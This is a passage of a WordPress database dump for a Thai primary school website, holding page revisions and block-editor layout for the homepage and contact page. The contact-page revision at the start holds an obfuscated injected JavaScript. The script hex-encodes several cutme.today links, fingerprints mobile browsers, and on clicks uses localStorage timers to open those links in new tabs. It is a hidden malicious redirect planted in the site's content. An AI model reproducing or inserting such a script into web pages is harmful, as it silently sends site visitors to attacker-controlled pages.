_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลการติดต่อหน่วยงาน','','inherit','closed','closed','','362-revision-v1','','','2024-08-03 21:30:01','2024-08-03 14:30:01','',362,'http://pakhaeng.ssk.in.th/?p=510',0,'revision','',0),
(512,1,'2024-08-03 21:45:24','2024-08-03 14:45:24','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- 